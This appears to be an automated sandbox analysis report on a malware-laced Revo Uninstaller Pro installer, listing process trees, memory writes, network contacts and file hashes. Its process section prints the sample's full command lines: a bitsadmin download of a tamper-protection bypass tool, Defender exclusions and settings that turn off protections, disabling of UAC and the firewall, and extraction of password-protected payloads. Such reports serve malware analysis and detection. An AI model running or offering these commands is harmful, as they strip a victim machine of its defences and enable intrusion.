N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$50150,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$30186,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\system32\rundll32.exe

"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\system32\regsvr32.exe

"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "

C:\Windows\SysWOW64\mode.com

mode 65,10

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted

C:\Windows\SysWOW64\timeout.exe

timeout /T 180 /NOBREAK

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"111.exe"

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp

Files

memory/1924-0-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/1924-2-0x0000000000401000-0x00000000004A9000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

MD5 d0e24e6d7017127bea02bb0160229bee
SHA1 34350e5b7f268797b2a7ec56390c2228f841b37b
SHA256 ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512 f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

memory/2712-12-0x0000000000400000-0x0000000000689000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-CFOUU.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

MD5 c84933bcccf41369ef9ecce015b86ed0
SHA1 624713276ae217d8d05c03598eecd31209c7f77a
SHA256 ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

MD5 dc21d689cfa1860e8820ed0ee45b1f2a
SHA1 acf2db6df76114601a2e58097629e0c8cbce129b
SHA256 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512 a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

memory/2840-36-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

MD5 b0a7842dd51df8942bc8b837282d1c2b
SHA1 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA256 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512 b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp

MD5 74f1186a6d3bc01716681712c6b24a74
SHA1 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18
SHA256 d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d
SHA512 bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

memory/2712-48-0x0000000000400000-0x0000000000689000-memory.dmp

memory/1924-50-0x0000000000400000-0x00000000004CE000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\iswin7logo.dll

MD5 1ea948aad25ddd347d9b80bef6df9779
SHA1 0be971e67a6c3b1297e572d97c14f74b05dafed3
SHA256 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512 f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

memory/2336-62-0x00000000746E0000-0x00000000746FB000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

memory/2336-79-0x00000000744D0000-0x00000000744E1000-memory.dmp

memory/2336-81-0x0000000001E00000-0x0000000001E0F000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2aa2713f855ff114ac2fdaaf8e7acfe5
SHA1 1da6223cc9d34b572213d4e6ab3990efba5f4b36
SHA256 82585b756e0cf581f621aff8a299afad83d3595eabcadae3b32fdd4e3c125836
SHA512 72b29461c19c01e8a6fd0f8274b965733f94f758fe7907251160353fc4f1694f4ffdc0eb59067cc1791145e448f5f8cfd039f342b752db5d91385f658446f64b

memory/2336-138-0x0000000001E00000-0x0000000001E0F000-memory.dmp

memory/2336-137-0x00000000744D0000-0x00000000744E1000-memory.dmp

memory/2336-136-0x00000000746E0000-0x00000000746FB000-memory.dmp

memory/2336-135-0x0000000000400000-0x0000000000509000-memory.dmp

memory/2840-134-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2336-174-0x0000000000400000-0x0000000000509000-memory.dmp

\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

MD5 ddb041550a3e69764cd9d7d3de3636f3
SHA1 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA256 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA512 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

MD5 edc78deb34de240c787b1011161e9a4e
SHA1 2d31275530dce33d3bc329991c8ad59e1b303577
SHA256 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512 e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

C:\Windows\System32\drivers\revoflt.sys

MD5 498c3d4d44382a96812a0e0ff28d575b
SHA1 c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA256 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512 ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

memory/2336-319-0x00000000746E0000-0x00000000746FB000-memory.dmp

memory/2336-318-0x0000000000400000-0x0000000000509000-memory.dmp

\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

MD5 75d7bf3468669a6c3df6f4d048315128
